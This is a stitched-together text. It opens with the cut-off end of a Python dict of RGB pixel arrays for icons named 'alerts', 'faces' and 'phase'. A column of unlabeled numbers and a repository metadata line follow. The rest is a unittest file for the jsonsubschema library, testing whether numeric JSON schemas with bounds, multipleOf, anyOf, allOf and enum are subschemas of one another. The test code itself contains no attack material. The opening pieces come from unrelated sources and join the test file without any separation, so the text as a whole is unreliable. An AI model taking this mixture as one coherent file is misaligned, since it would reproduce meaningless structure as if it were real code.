255], [255, 255, 255], [255, 235, 59], [255, 235, 59], [254, 254, 254]]], 'alerts': [[[0, 0, 1], [0, 1, 0], [0, 0, 0], [0, 1, 1], [1, 0, 0], [0, 0, 0], [0, 0, 0], [0, 1, 0], [0, 1, 0], [1, 1, 0], [244, 67, 54], [0, 1, 0], [1, 1, 0], [244, 67, 54], [0, 0, 0], [1, 0, 0], [1, 1, 0], [0, 0, 0], [244, 67, 54], [0, 0, 0], [0, 0, 0], [244, 67, 54], [0, 0, 0], [1, 1, 0], [1, 1, 1], [0, 0, 0], [244, 67, 54], [1, 1, 0], [1, 1, 0], [244, 67, 54], [1, 0, 0], [1, 0, 0], [1, 1, 0], [0, 1, 0], [244, 67, 54], [1, 1, 1], [0, 0, 0], [244, 67, 54], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [1, 1, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 1], [1, 1, 0], [0, 0, 0], [244, 67, 54], [0, 1, 1], [0, 0, 0], [244, 67, 55], [0, 0, 0], [1, 1, 0], [0, 0, 0], [0, 1, 0], [1, 0, 0], [1, 0, 0], [0, 1, 1], [0, 0, 0], [0, 0, 0], [1, 0, 0]]], 'faces': [[[0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 1], [0, 0, 0], [0, 0, 0], [0, 0, 0], [1, 0, 0], [0, 0, 0], [0, 0, 0], [37, 0, 82], [0, 1, 1], [0, 0, 0], [37, 0, 82], [0, 0, 0], [1, 1, 1], [0, 0, 0], [0, 0, 0], [74, 20, 140], [0, 0, 0], [0, 0, 0], [74, 20, 140], [0, 0, 0], [1, 0, 0], [0, 0, 0], [0, 0, 0], [63, 81, 181], [1, 1, 0], [0, 0, 0], [63, 81, 181], [0, 0, 0], [1, 1, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [1, 0, 1], [0, 0, 0], [0, 0, 1], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [244, 67, 54], [236, 91, 81], [244, 67, 54], [244, 67, 54], [0, 0, 0], [1, 1, 0], [0, 0, 0], [244, 66, 54], [0, 0, 0], [1, 1, 1], [0, 0, 0], [0, 0, 0], [244, 67, 54], [1, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [1, 1, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0]], [[121, 85, 72], [121, 85, 72], [121, 85, 72], [121, 85, 72], [121, 85, 72], [121, 85, 72], [121, 85, 72], [121, 85, 73], [121, 85, 72], [255, 204, 188], [255, 204, 188], [255, 204, 188], [255, 204, 188], [255, 204, 188], [255, 204, 188], [121, 84, 72], [255, 204, 188], [255, 204, 188], [255, 204, 188], [255, 204, 188], [255, 204, 188], [255, 204, 188], [255, 204, 188], [255, 204, 188], [0, 0, 0], [255, 204, 188], [255, 204, 188], [255, 204, 188], [255, 204, 188], [255, 204, 188], [255, 204, 188], [0, 1, 0], [255, 204, 188], [255, 204, 188], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [255, 204, 188], [254, 205, 188], [255, 204, 188], [255, 204, 188], [255, 204, 188], [0, 0, 0], [255, 87, 34], [255, 87, 34], [255, 204, 188], [255, 204, 188], [255, 204, 188], [255, 204, 188], [255, 204, 188], [255, 205, 188], [255, 204, 188], [255, 204, 188], [255, 204, 188], [255, 204, 188], [255, 204, 188], [255, 204, 188], [255, 204, 188], [255, 204, 188], [255, 204, 188], [255, 204, 188], [255, 204, 188], [254, 205, 189]], [[43, 29, 24], [43, 29, 24], [43, 29, 24], [43, 29, 24], [43, 29, 24], [43, 29, 24], [43, 29, 24], [43, 29, 24], [43, 29, 24], [43, 29, 24], [43, 29, 24], [43, 29, 24], [43, 29, 24], [43, 29, 24], [43, 29, 24], [42, 29, 25], [43, 29, 24], [145, 105, 94], [145, 105, 94], [145, 105, 94], [145, 105, 94], [145, 105, 94], [145, 105, 94], [43, 29, 24], [145, 105, 94], [145, 105, 94], [145, 105, 94], [145, 105, 94], [145, 105, 94], [145, 105, 94], [145, 105, 94], [145, 104, 94], [145, 105, 94], [255, 254, 255], [63, 81, 181], [145, 105, 94], [145, 105, 94], [63, 81, 181], [255, 255, 255], [145, 105, 94], [145, 105, 94], [145, 105, 94], [145, 105, 94], [84, 51, 42], [84, 51, 42], [145, 105, 94], [145, 105, 94], [144, 104, 94], [145, 105, 94], [145, 105, 94], [51, 34, 29], [153, 56, 56], [153, 56, 56], [51, 34, 29], [145, 105, 94], [144, 104, 94], [145, 105, 94], [145, 105, 94], [51, 34, 29], [51, 35, 29], [51, 34, 29], [51, 34, 29], [145, 105, 94], [144, 104, 94]]], 'phase': [[[0, 0, 0], [0, 188, 212], [0, 0, 0], [1, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 189, 212], [0, 0, 0], [0, 188, 212], [0, 0, 0], [0, 1, 0], [255, 255, 255], [0, 0, 0], [0, 0, 0], [1, 188, 212], [255, 255, 255], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 188, 212], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 188, 212], [0, 0, 0], [0, 0, 0], [1, 0, 1], [0, 188, 212], [0, 0, 0], [255, 255, 255], [0, 1, 0], [0, 188, 212], [0, 1, 0], [255, 255, 255], [1, 0, 1], [0, 188, 212], [0, 0, 0], [0, 188, 212], [1, 1, 0], [0, 188, 212], [0, 0, 0], [0, 188, 212], [0, 0, 0], [0, 188, 212], [0, 0, 0], [0, 188, 212], [0, 1, 0], [0, 0, 0], [0, 0, 0], [0, 188, 212], [1, 0, 1], [0, 0, 0], [0, 0, 1], [0, 188, 212], [1, 1, 1], [0, 0, 0], [1, 0, 0], [0, 188, 212], [1, 0, 0], [255, 255, 255], [0, 0, 0], [0, 0, 0], [254, 254, 254]], [[0, 188, 212], [0, 0, 0], [0, 188, 212], [0, 0, 1], [0, 188, 212], [0, 0, 0], [0, 0, 0], [0, 1, 1], [0, 188, 212], [0, 0, 0], [0, 188, 212], [1, 0, 0], [0, 0, 0], [0, 0, 0], [255, 255, 255], [1, 0, 0], [0, 0, 0], [0, 0, 0], [0, 188, 212], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 188, 212], [0, 1, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [1, 1, 1], [0, 0, 0], [0, 0, 0], [0, 188, 212], [254, 255, 254], [0, 0, 0], [255, 254, 255], [0, 0, 0], [0, 0, 1], [0, 0, 0], [0, 0, 0], [0, 188, 212], [1, 188, 212], [0, 0, 0], [0, 188, 212], [0, 0, 0], [0, 1, 0], [255, 255, 255], [0, 0, 0], [0, 0, 0], [0, 189, 213], [0, 0, 0], [0, 189, 212], [0, 0, 0], [0, 0, 1], [0, 188, 212], [0, 0, 0], [0, 0, 0], [0, 188, 212], [0, 0, 0], [1, 188, 212], [255, 255, 255], [0, 1, 0], [0, 188, 212], [0, 0, 0], [0, 0, 0], [0, 0, 0]]]}
| 17,227
| 34,453
| 0.342253
| 8,456
| 34,454
| 1.394513
| 0.00816
| 0.990502
| 1.406123
| 1.775441
| 0.981004
| 0.977866
| 0.96786
| 0.957938
| 0.95463
| 0.929783
| 0
| 0.451744
| 0.245458
| 34,454
| 1
| 34,454
| 34,454
| 0.001846
| 0
| 0
| 0
| 0
| 0
| 0.001132
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 15
|
3bd32dbb3e1eb8a4655fe2db4db2635d37f9c2b7
| 26,250
|
py
|
Python
|
test/test_numeric.py
|
hirzel/jsonsubschema
|
411b3b1fa0cbdc6e74e0d7975ef17ee99d79b175
|
[
"Apache-2.0"
] | 16
|
2020-05-29T09:21:25.000Z
|
2022-01-12T09:03:29.000Z
|
test/test_numeric.py
|
hirzel/jsonsubschema
|
411b3b1fa0cbdc6e74e0d7975ef17ee99d79b175
|
[
"Apache-2.0"
] | 9
|
2019-11-10T18:32:44.000Z
|
2022-02-18T00:47:14.000Z
|
test/test_numeric.py
|
hirzel/jsonsubschema
|
411b3b1fa0cbdc6e74e0d7975ef17ee99d79b175
|
[
"Apache-2.0"
] | 9
|
2019-11-02T06:52:57.000Z
|
2022-01-03T08:35:24.000Z
|
'''
Created on May 30, 2019
@author: Andrew Habib
'''
import unittest
from jsonschema.exceptions import SchemaError
from jsonsubschema import isSubschema
class TestIntegerSubtype(unittest.TestCase):
def test_identity(self):
s1 = {"type": "integer"}
s2 = s1
self.assertTrue(isSubschema(s1, s2))
def test_min_min(self):
s1 = {"type": "integer", "minimum": 5}
s2 = {"type": "integer", "minimum": 1}
with self.subTest():
self.assertTrue(isSubschema(s1, s2))
with self.subTest():
self.assertFalse(isSubschema(s2, s1))
def test_max_max(self):
s1 = {"type": "integer", "maximum": 10}
s2 = {"type": "integer", "maximum": 5}
with self.subTest():
self.assertFalse(isSubschema(s1, s2))
with self.subTest():
self.assertTrue(isSubschema(s2, s1))
def test_max_min(self):
s1 = {"type": "integer", "maximum": 10}
s2 = {"type": "integer", "minimum": 5}
with self.subTest():
self.assertFalse(isSubschema(s1, s2))
with self.subTest():
self.assertFalse(isSubschema(s2, s1))
def test_min_max(self):
s1 = {"type": "integer", "minimum": 10}
s2 = {"type": "integer", "maximum": 20}
with self.subTest():
self.assertFalse(isSubschema(s1, s2))
with self.subTest():
self.assertFalse(isSubschema(s2, s1))
def test_min_max_min_max1(self):
s1 = {"type": "integer", "minimum": 5, "maximum": 10}
s2 = {"type": "integer", "minimum": 1, "maximum": 20}
with self.subTest():
self.assertTrue(isSubschema(s1, s2))
with self.subTest():
self.assertFalse(isSubschema(s2, s1))
def test_min_max_min_max2(self):
s1 = {"type": "integer", "minimum": 5, "maximum": 20}
s2 = {"type": "integer", "minimum": 10, "maximum": 20}
with self.subTest():
self.assertFalse(isSubschema(s1, s2))
with self.subTest():
self.assertTrue(isSubschema(s2, s1))
def test_min_max_min_max3(self):
s1 = {"type": "integer", "minimum": 5, "maximum": 20}
s2 = {"type": "integer", "minimum": 40, "maximum": 100}
with self.subTest():
self.assertFalse(isSubschema(s1, s2))
with self.subTest():
self.assertFalse(isSubschema(s2, s1))
def test_xmin_max_min_max(self):
s1 = {"type": "integer", "minimum": 5,
"exclusiveMinimum": True, "maximum": 20}
s2 = {"type": "integer", "minimum": 5, "maximum": 20}
with self.subTest():
self.assertTrue(isSubschema(s1, s2))
with self.subTest():
self.assertFalse(isSubschema(s2, s1))
def test_xmin_max_min_xmax(self):
s1 = {"type": "integer", "minimum": 5,
"exclusiveMinimum": True, "maximum": 20}
s2 = {"type": "integer", "minimum": 5,
"maximum": 20, "exclusiveMaximum": True}
with self.subTest():
self.assertFalse(isSubschema(s1, s2))
with self.subTest():
self.assertFalse(isSubschema(s2, s1))
def test_xmin_xmax_min_max(self):
s1 = {"type": "integer", "minimum": 5, "exclusiveMinimum": True,
"maximum": 20, "exclusiveMaximum": True}
s2 = {"type": "integer", "minimum": 5, "maximum": 20}
with self.subTest():
self.assertTrue(isSubschema(s1, s2))
with self.subTest():
self.assertFalse(isSubschema(s2, s1))
def test_min_max_xmin_xmax1(self):
s1 = {"type": "integer", "minimum": 5, "exclusiveMinimum": True,
"maximum": 20, "exclusiveMaximum": True}
s2 = {"type": "integer", "minimum": 6, "maximum": 19}
with self.subTest():
self.assertTrue(isSubschema(s1, s2))
with self.subTest():
self.assertTrue(isSubschema(s2, s1))
def test_min_max_xmin_xmax2(self):
s1 = {"type": "integer", "minimum": 5, "exclusiveMinimum": True,
"maximum": 20, "exclusiveMaximum": True}
s2 = {"type": "integer", "minimum": 6, "maximum": 20}
with self.subTest():
self.assertTrue(isSubschema(s1, s2))
with self.subTest():
self.assertFalse(isSubschema(s2, s1))
def test_xmin_xmax_xmin_xmax(self):
s1 = {"type": "integer", "minimum": 5, "exclusiveMinimum": False,
"maximum": 20, "exclusiveMaximum": True}
s2 = {"type": "integer", "minimum": 5, "exclusiveMinimum": True,
"maximum": 20, "exclusiveMaximum": True}
with self.subTest():
self.assertFalse(isSubschema(s1, s2))
with self.subTest():
self.assertTrue(isSubschema(s2, s1))
def test_mulOf1(self):
s1 = {"type": "integer", "multipleOf": 10}
s2 = {"type": "integer"}
with self.subTest():
self.assertTrue(isSubschema(s1, s2))
with self.subTest():
self.assertFalse(isSubschema(s2, s1))
def test_mulOf2(self):
s1 = {"type": "integer", "multipleOf": 10}
s2 = {"type": "integer", "multipleOf": 5}
with self.subTest():
self.assertTrue(isSubschema(s1, s2))
with self.subTest():
self.assertFalse(isSubschema(s2, s1))
def test_mulOf3(self):
s1 = {"type": "integer", "multipleOf": 10}
s2 = {"type": "integer", "multipleOf": 98}
with self.subTest():
self.assertFalse(isSubschema(s1, s2))
with self.subTest():
self.assertFalse(isSubschema(s2, s1))
def test_mulOf_min(self):
s1 = {"type": "integer", "multipleOf": 10}
s2 = {"type": "integer", "minimum": 5}
with self.subTest():
self.assertFalse(isSubschema(s1, s2))
with self.subTest():
self.assertFalse(isSubschema(s2, s1))
def test_mulOf_min_min(self):
s1 = {"type": "integer", "multipleOf": 10, "minimum": 10}
s2 = {"type": "integer", "minimum": 5}
with self.subTest():
self.assertTrue(isSubschema(s1, s2))
with self.subTest():
self.assertFalse(isSubschema(s2, s1))
def test_mulOf_min_min_max(self):
s1 = {"type": "integer", "multipleOf": 10, "minimum": 10}
s2 = {"type": "integer", "minimum": 5, "maximum": 500}
with self.subTest():
self.assertFalse(isSubschema(s1, s2))
with self.subTest():
self.assertFalse(isSubschema(s2, s1))
def test_min_max_mul(self):
s1 = {"type": "integer", "minimum": 5, "maximum": 10, "multipleOf": 15}
s2 = {"type": "integer"}
with self.subTest():
self.assertTrue(isSubschema(s1, s2))
with self.subTest():
self.assertFalse(isSubschema(s2, s1))
def test_join1(self):
s1 = {"anyOf": [{"type": "integer", "minimum": 5,
"maximum": 10}, {"type": "integer", }]}
s2 = {"type": "integer"}
with self.subTest():
self.assertTrue(isSubschema(s1, s2))
with self.subTest():
self.assertTrue(isSubschema(s2, s1))
def test_join2(self):
s1 = {"anyOf": [{"type": "integer", "minimum": 5, "maximum": 10},
{"type": "integer", "minimum": 0}]}
s2 = {"type": "integer"}
with self.subTest():
self.assertTrue(isSubschema(s1, s2))
with self.subTest():
self.assertFalse(isSubschema(s2, s1))
def test_join3(self):
s1 = {"anyOf": [{"type": "integer", "minimum": 5, "maximum": 10},
{"type": "integer", "minimum": 0, "maximum": 3}]}
s2 = {"type": "integer", "minimum": -1}
with self.subTest():
self.assertTrue(isSubschema(s1, s2))
with self.subTest():
self.assertFalse(isSubschema(s2, s1))
def test_join4(self):
s1 = {"anyOf": [{"type": "integer", "minimum": 5, "maximum": 10},
{"type": "integer", "minimum": 0, "maximum": 4}]}
s2 = {"type": "integer", "minimum": 1, "maximum": 8}
with self.subTest():
self.assertFalse(isSubschema(s1, s2))
with self.subTest():
self.assertTrue(isSubschema(s2, s1))
def test_join5(self):
s1 = {"anyOf": [{"type": "integer", "minimum": 5, "exclusiveMinimum": True, "maximum": 10},
{"type": "integer", "minimum": 0, "maximum": 4}]}
s2 = {"type": "integer", "minimum": 1, "maximum": 8}
with self.subTest():
self.assertFalse(isSubschema(s1, s2))
with self.subTest():
self.assertFalse(isSubschema(s2, s1))
def test_join6(self):
s1 = {"anyOf": [{"type": "integer", "minimum": 0, "maximum": 10},
{"type": "integer", "minimum": 11}]}
s2 = {"type": "integer", "minimum": 0}
with self.subTest():
self.assertTrue(isSubschema(s1, s2))
with self.subTest():
self.assertTrue(isSubschema(s2, s1))
def test_join_mulof1(self):
s1 = {"anyOf": [{"type": "integer", "multipleOf": 5},
{"type": "integer"}]}
s2 = {"type": "integer"}
with self.subTest():
self.assertTrue(isSubschema(s1, s2))
with self.subTest():
self.assertTrue(isSubschema(s2, s1))
def test_join_mulof2(self):
s1 = {"anyOf": [{"type": "integer", "multipleOf": 5},
{"type": "integer", "multipleOf": 7}]}
s2 = {"type": "integer"}
with self.subTest():
self.assertTrue(isSubschema(s1, s2))
with self.subTest():
self.assertFalse(isSubschema(s2, s1))
def test_join_mulof3(self):
s1 = {"anyOf": [{"type": "integer", "multipleOf": 5},
{"type": "integer", "multipleOf": 7}]}
s2 = {"type": "integer", "multipleOf": 35}
with self.subTest():
self.assertFalse(isSubschema(s1, s2))
with self.subTest():
self.assertTrue(isSubschema(s2, s1))
def test_join_mulof4(self):
s1 = {"anyOf": [{"type": "integer", "multipleOf": 5},
{"type": "integer", "multipleOf": 7}]}
s2 = {"type": "integer", "multipleOf": 5}
with self.subTest():
self.assertFalse(isSubschema(s1, s2))
with self.subTest():
self.assertTrue(isSubschema(s2, s1))
def test_join_mulof5(self):
s1 = {"anyOf": [{"type": "integer", "multipleOf": 3},
{"type": "integer", "multipleOf": 6}]}
s2 = {"type": "integer", "multipleOf": 3}
with self.subTest():
self.assertTrue(isSubschema(s1, s2))
with self.subTest():
self.assertTrue(isSubschema(s2, s1))
def test_join_mulof6(self):
s1 = {"anyOf": [{"type": "integer", "multipleOf": 12},
{"type": "integer", "multipleOf": 9}]}
s2 = {"type": "integer", "multipleOf": 3}
with self.subTest():
self.assertTrue(isSubschema(s1, s2))
with self.subTest():
self.assertFalse(isSubschema(s2, s1))
def test_join_mulof7(self):
s1 = {"anyOf": [{"type": "integer", "multipleOf": 3, "maximum": 10},
{"type": "integer", "multipleOf": 5}]}
s2 = {"type": "integer", "multipleOf": 3}
with self.subTest():
self.assertFalse(isSubschema(s1, s2))
with self.subTest():
self.assertFalse(isSubschema(s2, s1))
def test_join_mulof8(self):
s1 = {"anyOf": [{"type": "integer", "minimum": 5, "maximum": 15, "multipleOf": 5},
{"type": "integer", "minimum": 5, "maximum": 15, "multipleOf": 3}]}
s2 = {"anyOf": [{"type": "integer", "minimum": 0, "maximum": 12, "multipleOf": 3},
{"type": "integer", "minimum": 1, "maximum": 20, "multipleOf": 5}]}
with self.subTest():
self.assertTrue(isSubschema(s1, s2))
with self.subTest():
self.assertFalse(isSubschema(s2, s1))
def test_join_mulof9(self):
s1 = {"type": "integer", "minimum": -4, "maximum": 10, "multipleOf": 5}
s2 = {"anyOf": [{"type": "integer", "minimum": 0, "maximum": 20, "multipleOf": 10},
{"type": "integer", "minimum": 1, "maximum": 10, "multipleOf": 5}]}
with self.subTest():
self.assertTrue(isSubschema(s1, s2))
with self.subTest():
self.assertFalse(isSubschema(s2, s1))
# @unittest.skip("Corner case of multipleOf") # check canonicalization/rewrite_enum
def test_join_mulof10(self):
s1 = {"enum": [1, 3, 5, 7, 9, 10]}
s2 = {"anyOf": [{"type": "integer", "minimum": 0, "maximum": 20, "multipleOf": 10}, {
"type": "integer", "minimum": 1, "maximum": 10, "multipleOf": 5}, {"enum": [1, 3, 7, 9]}]}
with self.subTest():
self.assertTrue(isSubschema(s1, s2))
with self.subTest():
self.assertFalse(isSubschema(s2, s1))
class TestNumberSubtype(unittest.TestCase):
def test_identity(self):
s1 = {"type": "number"}
s2 = s1
self.assertTrue(isSubschema(s1, s2))
def test_min_min(self):
s1 = {"type": "number", "minimum": 5}
s2 = {"type": "number", "minimum": 1}
with self.subTest():
self.assertTrue(isSubschema(s1, s2))
with self.subTest():
self.assertFalse(isSubschema(s2, s1))
def test_max_max(self):
s1 = {"type": "number", "maximum": 10}
s2 = {"type": "number", "maximum": 5}
with self.subTest():
self.assertFalse(isSubschema(s1, s2))
with self.subTest():
self.assertTrue(isSubschema(s2, s1))
def test_max_min(self):
s1 = {"type": "number", "maximum": 10}
s2 = {"type": "number", "minimum": 5}
with self.subTest():
self.assertFalse(isSubschema(s1, s2))
with self.subTest():
self.assertFalse(isSubschema(s2, s1))
def test_min_max(self):
s1 = {"type": "number", "minimum": 10}
s2 = {"type": "number", "maximum": 20}
with self.subTest():
self.assertFalse(isSubschema(s1, s2))
with self.subTest():
self.assertFalse(isSubschema(s2, s1))
def test_min_max_min_max1(self):
s1 = {"type": "number", "minimum": 5, "maximum": 10}
s2 = {"type": "number", "minimum": 1, "maximum": 20}
with self.subTest():
self.assertTrue(isSubschema(s1, s2))
with self.subTest():
self.assertFalse(isSubschema(s2, s1))
def test_min_max_min_max2(self):
s1 = {"type": "number", "minimum": 5, "maximum": 20}
s2 = {"type": "number", "minimum": 10, "maximum": 20}
with self.subTest():
self.assertFalse(isSubschema(s1, s2))
with self.subTest():
self.assertTrue(isSubschema(s2, s1))
def test_min_max_min_max3(self):
s1 = {"type": "number", "minimum": 5, "maximum": 20}
s2 = {"type": "number", "minimum": 40, "maximum": 100}
with self.subTest():
self.assertFalse(isSubschema(s1, s2))
with self.subTest():
self.assertFalse(isSubschema(s2, s1))
def test_xmin_max_min_max(self):
s1 = {"type": "number", "minimum": 5,
"exclusiveMinimum": True, "maximum": 20}
s2 = {"type": "number", "minimum": 5, "maximum": 20}
with self.subTest():
self.assertTrue(isSubschema(s1, s2))
with self.subTest():
self.assertFalse(isSubschema(s2, s1))
def test_xmin_max_min_xmax(self):
s1 = {"type": "number", "minimum": 5,
"exclusiveMinimum": True, "maximum": 20}
s2 = {"type": "number", "minimum": 5,
"maximum": 20, "exclusiveMaximum": True}
with self.subTest():
self.assertFalse(isSubschema(s1, s2))
with self.subTest():
self.assertFalse(isSubschema(s2, s1))
def test_xmin_xmax_min_max(self):
s1 = {"type": "number", "minimum": 5, "exclusiveMinimum": True,
"maximum": 20, "exclusiveMaximum": True}
s2 = {"type": "number", "minimum": 5, "maximum": 20}
with self.subTest():
self.assertTrue(isSubschema(s1, s2))
with self.subTest():
self.assertFalse(isSubschema(s2, s1))
def test_min_max_xmin_xmax1(self):
s1 = {"type": "number", "minimum": 5, "exclusiveMinimum": True,
"maximum": 20, "exclusiveMaximum": True}
s2 = {"type": "number", "minimum": 6, "maximum": 19}
with self.subTest():
self.assertFalse(isSubschema(s1, s2))
with self.subTest():
self.assertTrue(isSubschema(s2, s1))
def test_min_max_xmin_xmax2(self):
s1 = {"type": "number", "minimum": 5, "exclusiveMinimum": True,
"maximum": 20, "exclusiveMaximum": True}
s2 = {"type": "number", "minimum": 6, "maximum": 20}
with self.subTest():
self.assertFalse(isSubschema(s1, s2))
with self.subTest():
self.assertFalse(isSubschema(s2, s1))
def test_xmin_xmax_xmin_xmax(self):
s1 = {"type": "number", "minimum": 5, "exclusiveMinimum": False,
"maximum": 20, "exclusiveMaximum": True}
s2 = {"type": "number", "minimum": 5, "exclusiveMinimum": True,
"maximum": 20, "exclusiveMaximum": True}
with self.subTest():
self.assertFalse(isSubschema(s1, s2))
with self.subTest():
self.assertTrue(isSubschema(s2, s1))
def test_mulOf1(self):
s1 = {"type": "number", "multipleOf": 10.5}
s2 = {"type": "number"}
with self.subTest():
self.assertTrue(isSubschema(s1, s2))
with self.subTest():
self.assertFalse(isSubschema(s2, s1))
def test_mulOf2(self):
s1 = {"type": "number", "multipleOf": 1.5}
s2 = {"type": "number", "multipleOf": 6}
with self.subTest():
self.assertFalse(isSubschema(s1, s2))
with self.subTest():
self.assertTrue(isSubschema(s2, s1))
def test_mulOf3(self):
s1 = {"type": "number", "multipleOf": .5}
s2 = {"type": "number", "multipleOf": -.5}
self.assertRaises(SchemaError, isSubschema, s1, s2)
def test_mulOf4(self):
s1 = {"type": "number", "multipleOf": 1}
s2 = {"type": "number"}
with self.subTest():
self.assertTrue(isSubschema(s1, s2))
with self.subTest():
self.assertFalse(isSubschema(s2, s1))
def test_mulOf_min(self):
s1 = {"type": "number", "multipleOf": 10}
s2 = {"type": "number", "minimum": 5}
with self.subTest():
self.assertFalse(isSubschema(s1, s2))
with self.subTest():
self.assertFalse(isSubschema(s2, s1))
def test_mulOf_min_min(self):
s1 = {"type": "number", "multipleOf": 10, "minimum": 10}
s2 = {"type": "number", "minimum": 5}
with self.subTest():
self.assertTrue(isSubschema(s1, s2))
with self.subTest():
self.assertFalse(isSubschema(s2, s1))
def test_mulOf_min_min_max(self):
s1 = {"type": "number", "multipleOf": 10, "minimum": 10}
s2 = {"type": "number", "minimum": 5, "maximum": 500}
with self.subTest():
self.assertFalse(isSubschema(s1, s2))
with self.subTest():
self.assertFalse(isSubschema(s2, s1))
class TestNumericSubtype(unittest.TestCase):
def test_int_num(self):
s1 = {"type": "integer"}
s2 = {"type": "number"}
with self.subTest():
self.assertTrue(isSubschema(s1, s2))
with self.subTest():
self.assertFalse(isSubschema(s2, s1))
def test_min_num_int(self):
s1 = {"type": "number", "minimum": 1.5}
s2 = {"type": "integer", "minimum": 1}
with self.subTest():
self.assertFalse(isSubschema(s1, s2))
with self.subTest():
self.assertFalse(isSubschema(s2, s1))
def test_mulOf_num_min_int(self):
s1 = {"type": "number", "multipleOf": 10}
s2 = {"type": "integer", "minimum": 5}
with self.subTest():
self.assertFalse(isSubschema(s1, s2))
with self.subTest():
self.assertFalse(isSubschema(s2, s1))
def test_mulOf_num_int(self):
s1 = {"type": "number", "multipleOf": 10}
s2 = {"type": "integer"}
with self.subTest():
self.assertTrue(isSubschema(s1, s2))
with self.subTest():
self.assertFalse(isSubschema(s2, s1))
def test_mulOf_num_int2(self):
s1 = {"type": "number", "multipleOf": 1}
s2 = {"type": "integer"}
with self.subTest():
self.assertTrue(isSubschema(s1, s2))
with self.subTest():
self.assertTrue(isSubschema(s2, s1))
def test_decimal1(self):
s1 = {'maximum': 10.}
s2 = {'maximum': 10}
with self.subTest('LHS < RHS'):
self.assertTrue(isSubschema(s1, s2))
with self.subTest('RHS > LHS'):
self.assertTrue(isSubschema(s2, s1))
def test_not1(self):
s1 = {'not': {'type': 'integer', 'minimum': 10, 'maximum': 20}}
s2 = {'not': {'minimum': 10, 'maximum': 20}}
s1_ = {'anyOf': [{'type': 'boolean'}, {'type': 'object'}, {'type': 'null'}, {'type': 'array'}, {'type': 'string'}, {'maximum': 9, 'type': 'integer'}, {'minimum': 21, 'type': 'integer'}, {
'type': 'number', 'maximum': 9}, {'type': 'number', 'minimum': 21}, {'allOf': [{'type': 'number', 'minimum': 10, 'maximum': 20}, {'not': {'type': 'integer'}}]}]}
# with self.subTest('LHS < RHS'):
# self.assertFalse(isSubschema(s1, s1))
# with self.subTest('RHS > LHS'):
# self.assertTrue(isSubschema(s2, s1))
class TestCompositeNumericSubtype(unittest.TestCase):
def test_invalid_schema(self):
s1 = {"type": "integer"}
s2 = {"type": "number",
"allOf": [""]}
with self.subTest():
self.assertRaises(SchemaError, isSubschema, s1, s2)
with self.subTest():
self.assertRaises(SchemaError, isSubschema, s2, s1)
def test_int_int_num1(self):
s1 = {"type": "integer"}
s2 = {"type": "number",
"allOf": [{"type": "integer"}, {"type": "number", "minimum": 10}]}
with self.subTest():
self.assertFalse(isSubschema(s1, s2))
with self.subTest():
self.assertTrue(isSubschema(s2, s1))
def test_int_int_num2(self):
s1 = {"type": "integer", "multipleOf": 5}
s2 = {"type": "number",
"allOf": [{"type": "integer"}, {"type": "number", "minimum": 10}]}
with self.subTest():
self.assertFalse(isSubschema(s1, s2))
with self.subTest():
self.assertFalse(isSubschema(s2, s1))
def test_int_mul_mul1(self):
s1 = {"type": "integer", "multipleOf": 5}
s2 = {"type": "number",
"multipleOF": 3,
"allOf": [{"type": "integer"}, {"type": "number", "multipleOf": 3}]}
with self.subTest():
self.assertFalse(isSubschema(s1, s2))
with self.subTest():
self.assertFalse(isSubschema(s2, s1))
def test_int_mul_mul2(self):
s1 = {"type": "integer", "multipleOf": 15}
s2 = {"type": "number",
"multipleOf": 3,
"allOf": [{"type": "integer"}, {"type": "number", "multipleOf": 5}]}
with self.subTest():
self.assertTrue(isSubschema(s1, s2))
with self.subTest():
self.assertTrue(isSubschema(s2, s1))
def test_all_all_1(self):
s1 = {"type": "integer",
"allOf": [{"multipleOf": 3}, {"minimum": 5}]} # 6, 9, 12, 15, 18, ...
s2 = {"type": "number", "multipleOf": 3,
"allOf": [{"type": "integer"}, {"type": "number", "multipleOf": 5}]} # ..., -30, -15, 15, 30, 45, ..
with self.subTest():
self.assertFalse(isSubschema(s1, s2))
with self.subTest():
self.assertFalse(isSubschema(s2, s1))
def test_all_all_2(self):
s1 = {"type": "integer",
"allOf": [{"multipleOf": 3}]}
s2 = {"type": "number", "multipleOf": 3,
"allOf": [{"type": "integer"}, {"type": "number", "multipleOf": 3}]} # ..., -30, -15, 15, 30, 45, ..
with self.subTest():
self.assertTrue(isSubschema(s1, s2))
with self.subTest():
self.assertTrue(isSubschema(s2, s1))
def test_all_all_3(self):
s1 = {"type": "number", "allOf": [{"multipleOf": .3}]}
s2 = {"type": "number", "multipleOf": 3,
"allOf": [{"type": "integer"}, {"type": "number", "multipleOf": 3}]} # ..., -30, -15, 15, 30, 45, ..
with self.subTest():
self.assertFalse(isSubschema(s1, s2))
with self.subTest():
self.assertFalse(isSubschema(s2, s1))
def test_enum1(self):
s1 = {"enum": [1, 2, 3]}
s2 = {"type": "number"}
with self.subTest():
self.assertTrue(isSubschema(s1, s2))
with self.subTest():
self.assertFalse(isSubschema(s2, s1))
def test_enum2(self):
s1 = {"enum": [1.0, 2, 3]}
s2 = {"enum": [1, 2.0]}
with self.subTest():
self.assertFalse(isSubschema(s1, s2))
with self.subTest():
self.assertTrue(isSubschema(s2, s1))
def test_enum3(self):
s1 = {"enum": [1, 2, 3]}
s2 = {"type": "integer"}
with self.subTest():
self.assertTrue(isSubschema(s1, s2))
with self.subTest():
self.assertFalse(isSubschema(s2, s1))
